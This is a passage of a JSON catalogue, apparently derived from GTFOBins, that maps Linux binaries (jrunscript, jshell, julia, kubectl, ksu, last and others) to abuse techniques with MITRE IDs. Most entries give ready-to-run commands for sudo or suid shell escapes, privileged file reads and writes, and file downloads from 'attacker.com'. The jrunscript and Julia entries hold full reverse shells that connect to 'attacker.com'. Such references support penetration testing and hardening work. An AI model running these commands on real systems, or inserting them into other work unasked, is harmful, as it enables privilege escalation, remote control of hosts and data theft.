macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jrunscript:download:0:sudo","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"jrunscript -e 'cp(\"http://attacker.com/path/to/input-file\",\"/path/to/output-file\")'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jrunscript:download:0:unprivileged","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"jrunscript -e 'cp(\"http://attacker.com/path/to/input-file\",\"/path/to/output-file\")'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jrunscript:file-read:0:sudo","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"jrunscript -e 'br = new BufferedReader(new java.io.FileReader(\"/path/to/input-file\"));\n while ((line = br.readLine()) != null) { print(line); }'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jrunscript:file-read:0:unprivileged","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"jrunscript -e 'br = new BufferedReader(new java.io.FileReader(\"/path/to/input-file\"));\n while ((line = br.readLine()) != null) { print(line); }'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jrunscript:file-write:0:sudo","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"jrunscript -e 'var fw=new java.io.FileWriter(\"/path/to/output-file\");\n fw.write(\"DATA\");\n fw.close();'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jrunscript:file-write:0:unprivileged","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"jrunscript -e 'var fw=new java.io.FileWriter(\"/path/to/output-file\");\n fw.write(\"DATA\");\n fw.close();'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jrunscript:reverse-shell:0:sudo","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"jrunscript -e 'var host=\"attacker.com\";\n var port=12345;\n var p=new java.lang.ProcessBuilder(\"/bin/sh\", \"-i\").redirectErrorStream(true).start();\n var s=new java.net.Socket(host,port);\n var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();\n var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){\n while(pi.available()>0)so.write(pi.read());\n while(pe.available()>0)so.write(pe.read());\n while(si.available()>0)po.write(si.read());\n so.flush();po.flush();\n java.lang.Thread.sleep(50);\n try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jrunscript:reverse-shell:0:unprivileged","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"jrunscript -e 'var host=\"attacker.com\";\n var port=12345;\n var p=new java.lang.ProcessBuilder(\"/bin/sh\", \"-i\").redirectErrorStream(true).start();\n var s=new java.net.Socket(host,port);\n var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();\n var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){\n while(pi.available()>0)so.write(pi.read());\n while(pe.available()>0)so.write(pe.read());\n while(si.available()>0)po.write(si.read());\n so.flush();po.flush();\n java.lang.Thread.sleep(50);\n try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jrunscript:shell:0:sudo","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"jrunscript -e 'exec(\"/bin/sh -c $@|sh _ echo sh </dev/tty >/dev/tty 2>/dev/tty\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jrunscript:shell:0:suid","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"jrunscript -e 'exec(\"/bin/sh -pc $@|sh${IFS}-p _ echo sh -p </dev/tty >/dev/tty 2>/dev/tty\")'","description":"This has been found working in macOS but failing on Linux systems.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jrunscript:shell:0:unprivileged","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"jrunscript -e 'exec(\"/bin/sh -c $@|sh _ echo sh </dev/tty >/dev/tty 2>/dev/tty\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jshell:file-read:0:sudo","toolId":"gtfo:jshell","toolName":"jshell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"jshell\njshell> /open /path/to/input-file","description":"The content is leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jshell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jshell:file-read:0:unprivileged","toolId":"gtfo:jshell","toolName":"jshell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"jshell\njshell> /open /path/to/input-file","description":"The content is leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jshell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jshell:file-write:0:sudo","toolId":"gtfo:jshell","toolName":"jshell","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"jshell\nString x = \"DATA\";\n/save /path/to/output-file","description":"Writes only the valid Java code to file.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jshell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jshell:file-write:0:unprivileged","toolId":"gtfo:jshell","toolName":"jshell","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"jshell\nString x = \"DATA\";\n/save /path/to/output-file","description":"Writes only the valid Java code to file.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jshell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jshell:shell:0:sudo","toolId":"gtfo:jshell","toolName":"jshell","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"jshell\nRuntime.getRuntime().exec(\"/path/to/command\");","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jshell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jshell:shell:0:unprivileged","toolId":"gtfo:jshell","toolName":"jshell","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"jshell\nRuntime.getRuntime().exec(\"/path/to/command\");","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jshell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jtag:shell:0:sudo","toolId":"gtfo:jtag","toolName":"jtag","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"jtag --interactive\nshell /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jtag/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:jtag:shell:0:unprivileged","toolId":"gtfo:jtag","toolName":"jtag","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"jtag --interactive\nshell /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jtag/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:download:0:sudo","toolId":"gtfo:julia","toolName":"julia","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"julia -e 'download(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:download:0:suid","toolId":"gtfo:julia","toolName":"julia","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"julia -e 'download(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:download:0:unprivileged","toolId":"gtfo:julia","toolName":"julia","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"julia -e 'download(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:file-read:0:sudo","toolId":"gtfo:julia","toolName":"julia","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"julia -e 'print(open(f->read(f, String), \"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:file-read:0:suid","toolId":"gtfo:julia","toolName":"julia","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"julia -e 'print(open(f->read(f, String), \"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:file-read:0:unprivileged","toolId":"gtfo:julia","toolName":"julia","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"julia -e 'print(open(f->read(f, String), \"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:file-write:0:sudo","toolId":"gtfo:julia","toolName":"julia","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"julia -e 'open(f->write(f, \"DATA\"), /path/to/output-file, \"w\")'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:file-write:0:suid","toolId":"gtfo:julia","toolName":"julia","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"julia -e 'open(f->write(f, \"DATA\"), /path/to/output-file, \"w\")'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:file-write:0:unprivileged","toolId":"gtfo:julia","toolName":"julia","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"julia -e 'open(f->write(f, \"DATA\"), /path/to/output-file, \"w\")'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:reverse-shell:0:sudo","toolId":"gtfo:julia","toolName":"julia","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"julia -e 'using Sockets; sock=connect(\"attacker.com\", parse(Int64, 12345)); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:reverse-shell:0:suid","toolId":"gtfo:julia","toolName":"julia","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"julia -e 'using Sockets; sock=connect(\"attacker.com\", parse(Int64, 12345)); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:reverse-shell:0:unprivileged","toolId":"gtfo:julia","toolName":"julia","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"julia -e 'using Sockets; sock=connect(\"attacker.com\", parse(Int64, 12345)); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:shell:0:sudo","toolId":"gtfo:julia","toolName":"julia","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"julia -e 'run(`/bin/sh`)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:shell:0:suid","toolId":"gtfo:julia","toolName":"julia","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"julia -e 'run(`/bin/sh -p`)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:julia:shell:0:unprivileged","toolId":"gtfo:julia","toolName":"julia","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"julia -e 'run(`/bin/sh`)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/julia/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:knife:inherit:0:sudo","toolId":"gtfo:knife","toolName":"knife","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"knife exec -E '...'","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/knife/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:knife:inherit:0:unprivileged","toolId":"gtfo:knife","toolName":"knife","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"knife exec -E '...'","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/knife/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ksshell:file-read:0:sudo","toolId":"gtfo:ksshell","toolName":"ksshell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ksshell -i /path/to/input-file","description":"Each line is corrupted by a prefix string. Also consider that lines are actually parsed as `kickstart` scripts thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ksshell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ksshell:file-read:0:suid","toolId":"gtfo:ksshell","toolName":"ksshell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ksshell -i /path/to/input-file","description":"Each line is corrupted by a prefix string. Also consider that lines are actually parsed as `kickstart` scripts thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ksshell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ksshell:file-read:0:unprivileged","toolId":"gtfo:ksshell","toolName":"ksshell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ksshell -i /path/to/input-file","description":"Each line is corrupted by a prefix string. Also consider that lines are actually parsed as `kickstart` scripts thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ksshell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ksu:shell:0:sudo","toolId":"gtfo:ksu","toolName":"ksu","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ksu -q -e /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ksu/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:kubectl:shell:0:sudo","toolId":"gtfo:kubectl","toolName":"kubectl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cat >/path/to/temp-file <<EOF\nclusters:\n- cluster:\n server: https://x\n name: x\ncontexts:\n- context:\n cluster: x\n user: x\n name: x\ncurrent-context: x\nusers:\n- name: x\n user:\n exec:\n apiVersion: client.authentication.k8s.io/v1\n interactiveMode: Always\n command: /bin/sh\n args:\n - '-c'\n - '/bin/sh 0<&2 1>&2'\nEOF\n\nkubectl get pods --kubeconfig=/path/to/temp-file","description":"The shell is spawn multiple times.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/kubectl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:kubectl:shell:0:unprivileged","toolId":"gtfo:kubectl","toolName":"kubectl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cat >/path/to/temp-file <<EOF\nclusters:\n- cluster:\n server: https://x\n name: x\ncontexts:\n- context:\n cluster: x\n user: x\n name: x\ncurrent-context: x\nusers:\n- name: x\n user:\n exec:\n apiVersion: client.authentication.k8s.io/v1\n interactiveMode: Always\n command: /bin/sh\n args:\n - '-c'\n - '/bin/sh 0<&2 1>&2'\nEOF\n\nkubectl get pods --kubeconfig=/path/to/temp-file","description":"The shell is spawn multiple times.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/kubectl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:kubectl:upload:0:sudo","toolId":"gtfo:kubectl","toolName":"kubectl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"kubectl proxy --address=0.0.0.0 --port=12345 --www=/path/to/dir/ --www-prefix=/x/","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/kubectl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:kubectl:upload:0:suid","toolId":"gtfo:kubectl","toolName":"kubectl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"kubectl proxy --address=0.0.0.0 --port=12345 --www=/path/to/dir/ --www-prefix=/x/","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/kubectl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:kubectl:upload:0:unprivileged","toolId":"gtfo:kubectl","toolName":"kubectl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"kubectl proxy --address=0.0.0.0 --port=12345 --www=/path/to/dir/ --www-prefix=/x/","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/kubectl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:last:file-read:0:sudo","toolId":"gtfo:last","toolName":"last","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"last -a -f /path/to/input-file","description":"The output might be corrupted or incomplete if the file does not follow the expected database format.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/last/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["lastb"]},{"id":"gtfo:last:file-read:0:suid","toolId":"gtfo:last","toolName":"last","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"last -a -f /path/to/input-file","description":"The output might be corrupted or incomplete if the file does not follow the expected database format.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/last/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 